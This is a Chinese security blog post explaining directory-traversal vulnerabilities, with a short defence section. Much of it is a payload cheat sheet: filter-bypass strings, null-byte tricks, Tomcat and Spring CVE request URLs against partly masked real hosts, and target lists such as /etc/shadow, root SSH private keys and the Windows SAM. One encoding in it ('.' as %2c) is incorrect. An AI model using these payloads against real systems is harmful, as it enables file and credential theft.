<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="介绍目录遍历（目录穿越）是一个Web安全漏洞，攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据，后端系统的登录信息以及敏感的操作系统文件 在某些情况下，攻击者可能能够在服务器上写入任意文件，（如，FFFTP 是一款小型的 FTP 客户端软件。FFFTP客户端没有正确地验证 FTP 服务器所返回的 LIST 命令响应中包含有目录遍历序列（斜线）的文件名，如果用">
<meta property="og:type" content="article">
<meta property="og:title" content="浅谈目录穿越">
<meta property="og:url" content="http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/index.html">
<meta property="og:site_name" content="Du1L0v3">
<meta property="og:description" content="介绍目录遍历（目录穿越）是一个Web安全漏洞，攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据，后端系统的登录信息以及敏感的操作系统文件 在某些情况下，攻击者可能能够在服务器上写入任意文件，（如，FFFTP 是一款小型的 FTP 客户端软件。FFFTP客户端没有正确地验证 FTP 服务器所返回的 LIST 命令响应中包含有目录遍历序列（斜线）的文件名，如果用">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-04-25T00:06:48.000Z">
<meta property="article:modified_time" content="2021-10-31T03:46:53.857Z">
<meta property="article:author" content="Du1L0v3">
<meta property="article:tag" content="奇技淫巧">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>浅谈目录穿越</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<!--
<link rel="stylesheet" href="//cdn.bootcss.com/highlight.js/9.2.0/styles/github.min.css">
<script src="//cdn.bootcss.com/highlight.js/9.2.0/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
-->
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/duitutu">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post " href="/2021/04/25/%E8%AF%B4%E8%AF%9D%E7%9A%84%E8%89%BA%E6%9C%AF/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post " href="/2021/04/24/%E5%B0%8F%E8%B0%88%E6%80%A7%E7%9F%A5%E8%A7%89%E5%81%8F%E5%B7%AE%E5%AF%BC%E8%87%B4%E8%9C%9C%E6%B1%81%E8%87%AA%E4%BF%A1/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&text=浅谈目录穿越"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&title=浅谈目录穿越"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&is_video=false&description=浅谈目录穿越"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=浅谈目录穿越&body=Check out this article: http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&title=浅谈目录穿越"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&title=浅谈目录穿越"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&title=浅谈目录穿越"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&title=浅谈目录穿越"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&name=浅谈目录穿越&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/04/25/%E6%B5%85%E8%B0%88%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/&t=浅谈目录穿越"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.</span> <span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A7%BF%E5%8A%BF"><span class="toc-number">2.</span> <span class="toc-text">姿势</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x00-%E5%9F%BA%E7%A1%80%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86"><span class="toc-number">2.1.</span> <span class="toc-text">0x00 基础目录遍历</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01-%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84"><span class="toc-number">2.2.</span> <span class="toc-text">0x01 绝对路径</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02-%E5%8F%8C%E5%86%99-%E7%BB%95%E8%BF%87"><span class="toc-number">2.3.</span> <span class="toc-text">0x02 双写..&#x2F;绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x03-URL%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="toc-number">2.4.</span> <span class="toc-text">0x03 URL编码绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x04-%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84%E9%85%8D%E5%90%88"><span class="toc-number">2.5.</span> <span class="toc-text">0x04 绝对路径配合 ..&#x2F;</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x05-%E6%88%AA%E6%96%AD%E6%96%87%E4%BB%B6%E5%90%8E%E7%BC%80"><span class="toc-number">2.6.</span> <span class="toc-text">0x05 截断文件后缀</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x0x"><span class="toc-number">2.7.</span> <span class="toc-text">0x0x</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1"><span class="toc-number">3.</span> <span class="toc-text">防御</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E8%B7%AF%E5%BE%84%E6%95%B4%E7%90%86"><span class="toc-number">4.</span> <span class="toc-text">攻击路径整理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E6%95%B4%E7%90%86"><span class="toc-number">4.1.</span> <span class="toc-text">文件整理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B7%AF%E5%BE%84%E6%95%B4%E7%90%86"><span class="toc-number">4.2.</span> <span class="toc-text">路径整理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2014-3625"><span class="toc-number">4.3.</span> <span class="toc-text">CVE-2014-3625</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2018-1271"><span class="toc-number">4.4.</span> <span class="toc-text">CVE-2018-1271</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B7%AF%E5%BE%84%E9%81%8D%E5%8E%86%E6%A3%80%E6%B5%8B"><span class="toc-number">4.5.</span> <span class="toc-text">路径遍历检测</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1-1"><span class="toc-number">4.6.</span> <span class="toc-text">防御</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        浅谈目录穿越
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Du1L0v3</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-04-25T00:06:48.000Z" itemprop="datePublished">2021-04-25</time>
        
        (Updated: <time datetime="2021-10-31T03:46:53.857Z" itemprop="dateModified">2021-10-31</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E6%99%BA%E6%85%A7%E7%9A%84%E6%94%B6%E8%97%8F/">智慧的收藏</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/" rel="tag">奇技淫巧</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h2><p>目录遍历（目录穿越）是一个Web安全漏洞，攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据，后端系统的登录信息以及敏感的操作系统文件</p>
<p>在某些情况下，攻击者可能能够在服务器上写入任意文件，（如，FFFTP 是一款小型的 FTP 客户端软件。FFFTP客户端没有正确地验证 FTP 服务器所返回的 LIST 命令响应中包含有目录遍历序列（斜线）的文件名，如果用户受骗从恶意的 FTP 服务器下载的目录包含有带有恶意文件名的文件的话，就可能导致向用户系统的任意位置写入文件）从而允许他们修改应用程序数据或行为，并最终完全控制服务器</p>
<h2 id="姿势"><a href="#姿势" class="headerlink" title="姿势"></a>姿势</h2><h3 id="0x00-基础目录遍历"><a href="#0x00-基础目录遍历" class="headerlink" title="0x00 基础目录遍历"></a>0x00 基础目录遍历</h3><p>直接利用 ../ 返回上一级来遍历任意文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd</span><br></pre></td></tr></table></figure>

<h3 id="0x01-绝对路径"><a href="#0x01-绝对路径" class="headerlink" title="0x01 绝对路径"></a>0x01 绝对路径</h3><p>web网站有时候会采取目录遍历的防御措施，如过滤 ../ 上一级等关键字，然后简单的过滤通常会被绕过。有时候可以直接采用绝对路径，无须 ../ 返回上一级目录遍历</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;etc&#x2F;passwd</span><br></pre></td></tr></table></figure>

<h3 id="0x02-双写-绕过"><a href="#0x02-双写-绕过" class="headerlink" title="0x02 双写../绕过"></a>0x02 双写../绕过</h3><p>有时候，防御措施是直接将 ../ 替换为空，可以直接采用双写直接绕过：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">....&#x2F;&#x2F;....&#x2F;&#x2F;....&#x2F;&#x2F;&#x2F;etc&#x2F;passwd</span><br></pre></td></tr></table></figure>

<h3 id="0x03-URL编码绕过"><a href="#0x03-URL编码绕过" class="headerlink" title="0x03 URL编码绕过"></a>0x03 URL编码绕过</h3><p>也可以采用 URL 编码来绕过服务器对 . 或者 / 的检测</p>
<blockquote>
<p>.  =&gt; %2c</p>
<p>/  =&gt; %2f</p>
<p>% =&gt; %25 (双重URL编码)</p>
</blockquote>
<h3 id="0x04-绝对路径配合"><a href="#0x04-绝对路径配合" class="headerlink" title="0x04 绝对路径配合 ../"></a>0x04 绝对路径配合 ../</h3><p>有些 web 在获取文件时，会首先判断是否以一个固定的路径开头</p>
<p>那么就可以配合 ../ 来返回上一级遍历任意文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;var&#x2F;www&#x2F;images&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd</span><br></pre></td></tr></table></figure>

<h3 id="0x05-截断文件后缀"><a href="#0x05-截断文件后缀" class="headerlink" title="0x05 截断文件后缀"></a>0x05 截断文件后缀</h3><p>某些 web 对文件类型作了限制，只有当后缀为图片时才解析</p>
<p>这时候就可以利用 %00 来截断</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd%00.jpg</span><br></pre></td></tr></table></figure>

<h3 id="0x0x"><a href="#0x0x" class="headerlink" title="0x0x"></a>0x0x</h3><p>要读取根目录下的文件的话 ../ 可以随意拼接任意个，就像 ../../../../../../../../../../../../../../../../../../../../../../</p>
<p>因为到了根目录再返回上级目录依然是根目录</p>
<h2 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h2><p>防止文件路径遍历漏洞的最有效方法是避免将用户提供的输入完全传递给文件系统API</p>
<p>如果认为不可避免的是将用户提供的输入传递给文件系统 API，则应同时使用两层防御，以防止受到攻击：</p>
<blockquote>
<ul>
<li>应用程序应在处理之前验证用户输入。理想情况下，验证应与允许值的白名单进行比较。如果所需的功能无法做到这一点，则验证应验证输入内容仅包含允许的内容，例如纯字母数字字符</li>
<li>验证提供的输入后，应用程序应将输入附加到基本目录，并使用平台文件系统 API 规范化路径。验证规范化路径以预期的基本目录开头</li>
</ul>
</blockquote>
<h2 id="攻击路径整理"><a href="#攻击路径整理" class="headerlink" title="攻击路径整理"></a>攻击路径整理</h2><h3 id="文件整理"><a href="#文件整理" class="headerlink" title="文件整理"></a>文件整理</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">C:\WINDOWS\system32\drivers\etc\hosts #Win10</span><br><span class="line">C:\boot.int  #Win7 隐藏文件</span><br><span class="line">web.xml  #Java Web项目配置文件  </span><br><span class="line">&#x2F;WEB-INF&#x2F;web.xml</span><br><span class="line">C:\Program Files\mysql\my.ini  #Mysql下配置文件</span><br><span class="line">&#x2F;etc&#x2F;passwd</span><br><span class="line">&#x2F;etc&#x2F;hosts</span><br><span class="line">&#x2F;etc&#x2F;group</span><br><span class="line">&#x2F;etc&#x2F;shadow</span><br><span class="line">&#x2F;.htaccess</span><br><span class="line">&#x2F;phpinfo.php</span><br><span class="line">&#x2F;inc&#x2F;db.php</span><br><span class="line">&#x2F;inc&#x2F;conn.php</span><br><span class="line">&#x2F;Windows&#x2F;system.ini</span><br><span class="line"></span><br><span class="line"># Tomcat</span><br><span class="line">&#x2F;%c0%ae%c0%ae&#x2F;%c0%ae%c0%ae&#x2F;%c0%ae%c0%ae&#x2F;etc&#x2F;passwd</span><br><span class="line"></span><br><span class="line"># Windows + IIS + asp</span><br><span class="line">http:&#x2F;&#x2F;test.com&#x2F;scripts&#x2F;..%5c..&#x2F;Windows&#x2F;System32&#x2F;cmd.exe?&#x2F;c+dir+c:\  # 老版本 - IIS CGI文件名解码漏洞</span><br><span class="line">http:&#x2F;&#x2F;test.com&#x2F;show.asp?view&#x3D;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;Windows&#x2F;system.ini</span><br></pre></td></tr></table></figure>

<h3 id="路径整理"><a href="#路径整理" class="headerlink" title="路径整理"></a>路径整理</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd%00</span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd%00</span><br><span class="line">http:&#x2F;&#x2F;xx.xx.com&#x2F;en&#x2F;..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\&#x2F;etc&#x2F;sysconfig&#x2F;network-scripts&#x2F;ifcfg-eth1</span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd</span><br><span class="line">....&#x2F;&#x2F;....&#x2F;&#x2F;static&#x2F;xx.php%00.png</span><br><span class="line"></span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;WEB-INF&#x2F;web.xml</span><br><span class="line"></span><br><span class="line">C:&#x2F;inetpub&#x2F;wwwroot&#x2F;global.asa</span><br><span class="line">C:\inetpub\wwwroot\global.asa</span><br><span class="line">C:&#x2F;boot.ini</span><br><span class="line">C:\boot.ini</span><br><span class="line">D:\inetpub\wwwroot\global.asa</span><br><span class="line">D:&#x2F;inetpub&#x2F;wwwroot&#x2F;global.asa</span><br><span class="line"></span><br><span class="line">xx.php?vt&#x3D;&amp;cate&#x3D;&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd%00</span><br><span class="line">http:&#x2F;&#x2F;xx.xx.com&#x2F;doc&#x2F;index?md&#x3D;diagnose_api&amp;app&#x3D;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd%00</span><br><span class="line">http:&#x2F;&#x2F;xx.xx.com&#x2F;en&#x2F;..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\&#x2F;etc&#x2F;sysconfig&#x2F;network-scripts&#x2F;ifcfg-eth1</span><br><span class="line">http:&#x2F;&#x2F;xx.xx.xx.xx&#x2F;pcheck&#x2F;index.php?action&#x3D;showPcheck&amp;report&#x3D;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd</span><br><span class="line">http:&#x2F;&#x2F;xx.xx.com&#x2F;xx&#x2F;img.php?s&#x3D;16,40&amp;n&#x3D;....&#x2F;&#x2F;....&#x2F;&#x2F;static&#x2F;xx.php%00.png</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">C:&#x2F;inetpub&#x2F;wwwroot&#x2F;global.asa</span><br><span class="line">C:\inetpub\wwwroot\global.asa</span><br><span class="line">C:&#x2F;boot.ini</span><br><span class="line">C:\boot.ini</span><br><span class="line">D:\inetpub\wwwroot\global.asa</span><br><span class="line">D:&#x2F;inetpub&#x2F;wwwroot&#x2F;global.asa</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;2xx.xx.xx.xx:8080&#x2F;xampp&#x2F;showcode.php&#x2F;c:xampp&#x2F;htdocs&#x2F;xampp&#x2F;showcode.php?showcode&#x3D;1</span><br><span class="line">https:&#x2F;&#x2F;xx.xx.com&#x2F;static&#x2F;images&#x2F;couch-ipad.png..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd</span><br><span class="line">http:&#x2F;&#x2F;gmu.xx.com&#x2F;demo&#x2F;data&#x2F;tabs&#x2F;proxy.php?debug&#x3D;1&amp;key&#x3D;&amp;file&#x3D;file:&#x2F;&#x2F;&#x2F;etc&#x2F;hosts</span><br><span class="line">http:&#x2F;&#x2F;gmu.xx.com&#x2F;demo&#x2F;data&#x2F;tabs&#x2F;proxy.php?debug&#x3D;1&amp;key&#x3D;&amp;file&#x3D;file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd</span><br><span class="line">http:&#x2F;&#x2F;xx.xx.com&#x2F;frame_scc&#x2F;downLoad?template&#x3D;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd</span><br><span class="line">http:&#x2F;&#x2F;xx.12.22.xx&#x2F;downloadFile.do?fileName&#x3D;&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd</span><br></pre></td></tr></table></figure>

<h3 id="CVE-2014-3625"><a href="#CVE-2014-3625" class="headerlink" title="CVE-2014-3625"></a>CVE-2014-3625</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;218.2.197.XX:18015&#x2F;spring-css&#x2F;resources&#x2F;file:&#x2F;etc&#x2F;passwd </span><br><span class="line">http:&#x2F;&#x2F;218.2.197.XX:18015&#x2F;spring-css&#x2F;resources&#x2F;file:&#x2F;etc&#x2F;flag</span><br></pre></td></tr></table></figure>

<h3 id="CVE-2018-1271"><a href="#CVE-2018-1271" class="headerlink" title="CVE-2018-1271"></a>CVE-2018-1271</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1:8080&#x2F;spring-mvc-showcase&#x2F;resources&#x2F;xxx&#x2F;..%5c&#x2F;..%5c&#x2F;..%5c&#x2F;windows&#x2F;win.ini</span><br></pre></td></tr></table></figure>

<h3 id="路径遍历检测"><a href="#路径遍历检测" class="headerlink" title="路径遍历检测"></a>路径遍历检测</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;root&#x2F;.ssh&#x2F;authorized_keys</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;id_rsa</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;id_rsa.keystore</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;known_hosts</span><br><span class="line">&#x2F;etc&#x2F;httpd&#x2F;conf&#x2F;httpd.conf</span><br><span class="line">&#x2F;root&#x2F;.bash_history</span><br><span class="line">&#x2F;root&#x2F;.mysql_history</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;fd[0-9]*(文件标识符)</span><br><span class="line">&#x2F;proc&#x2F;mounts</span><br><span class="line">&#x2F;proc&#x2F;config.gz&#x2F;etc&#x2F;my.cnf</span><br><span class="line">C:\Program Files\mysql\data\mysql\user.MYD</span><br><span class="line">C:\Windows\php.in</span><br><span class="line">C:\Windows\my.ini</span><br><span class="line">C:\boot.int</span><br><span class="line">C:\Windows\System32\inetsrc\MetaBase.xml</span><br><span class="line">C:\Windows\repair\sam</span><br><span class="line">..&#x2F;..&#x2F;ierp&#x2F;bin&#x2F;prop.xml</span><br></pre></td></tr></table></figure>

<h3 id="防御-1"><a href="#防御-1" class="headerlink" title="防御"></a>防御</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Apache</span><br><span class="line">在httpd.conf文件中找到   Options +Indexes +FollowSymLinks +ExecCGI  并修改成   Options -Indexes+FollowSymLinks +ExecCGI  并保存</span><br><span class="line"></span><br><span class="line">Tomcat</span><br><span class="line">修改conf&#x2F;web.xml，将true 改为false 重启tomcat</span><br><span class="line"></span><br><span class="line">IIS</span><br><span class="line">1、在服务器端，打开 控制面板 --&gt;管理工具--&gt; IIS管理器</span><br><span class="line">2、右击默认网站 --&gt; 属性--&gt; 主目录 --&gt;取消“目录浏览”复选框</span><br></pre></td></tr></table></figure>
  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/duitutu">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
